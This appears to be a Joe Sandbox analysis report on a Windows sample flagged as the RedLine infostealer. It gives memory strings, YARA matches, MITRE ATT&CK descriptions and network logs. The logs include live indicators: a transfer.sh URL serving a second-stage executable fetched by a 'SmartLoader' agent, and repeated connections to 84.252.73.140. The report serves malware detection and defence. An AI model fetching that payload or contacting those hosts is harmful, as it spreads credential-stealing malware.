Source: RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 123.exe, 123.exe, 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmp, RegSvcs.exe, 00000003.00000002.514026259.0000000000802000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: RegSvcs.exe, 00000008.00000002.516652435.0000000000E00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/yAEPpl/gggge.exe
Source: file.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: global traffic	HTTP traffic detected: GET /get/yAEPpl/gggge.exe HTTP/1.1User-Agent: SmartLoaderHost: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: SmartLoaderHost: ip-api.com
Source: global traffic	HTTP traffic detected: GET /get/yAEPpl/gggge.exe HTTP/1.1Content-Type: application/jsonUser-Agent: SmartLoaderHost: transfer.sh

Source: 3.2.RegSvcs.exe.800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.123.exe.92ca60.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.123.exe.1080000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.123.exe.92ca60.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.123.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: C:\Windows\Temp\123.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\321.exe	Joe Sandbox ML: detected

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140

Source: 3.2.RegSvcs.exe.800000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.123.exe.92ca60.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.123.exe.1080000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.123.exe.92ca60.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.123.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3848E	0_2_00A3848E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A46CDC	0_2_00A46CDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A400B7	0_2_00A400B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A44088	0_2_00A44088
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D8EE	0_2_00A5D8EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A340FE	0_2_00A340FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3286B	0_2_00A3286B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3E9B7	0_2_00A3E9B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A619F4	0_2_00A619F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A551C9	0_2_00A551C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A47153	0_2_00A47153
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A332F7	0_2_00A332F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A462CA	0_2_00A462CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A443BF	0_2_00A443BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3C426	0_2_00A3C426
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3F461	0_2_00A3F461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D440	0_2_00A5D440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A43E0B	0_2_00A43E0B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A54F9A	0_2_00A54F9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3EFE2	0_2_00A3EFE2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A477EF	0_2_00A477EF
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00901CDA	1_2_00901CDA
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00914249	1_2_00914249
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00913A6D	1_2_00913A6D
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00902BAB	1_2_00902BAB
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00902B1C	1_2_00902B1C
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0090F34E	1_2_0090F34E
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0091867F	1_2_0091867F

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00A4EC50 appears 50 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00A4EB78 appears 36 times
Source: C:\Windows\Temp\123.exe	Code function: String function: 009059D0 appears 49 times

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_123.exe_32f05459eb6f24c8a3f7dd7195e458f491582729_7037eb10_140f9119\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_321.exe_69257ad151fe39f2e7833811d7794a2b82d361d_091ec038_19a39139\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_bd9581c2744d4f52fbb07295eae52cccbbca52_85207d7d_143b90ac\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5818.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER59DE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A6B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EA0.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FF8.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6096.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER674C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER67AB.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\gggge[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json

Windows Analysis Report
file.exe

Function 00A4A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Function 00A3A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Function 00A57DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 00A3848E Relevance: 2.5, APIs: 1, Instructions: 960
COMMONCrypto

Function 00A46CDC Relevance: .3, Instructions: 343
COMMONCrypto

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre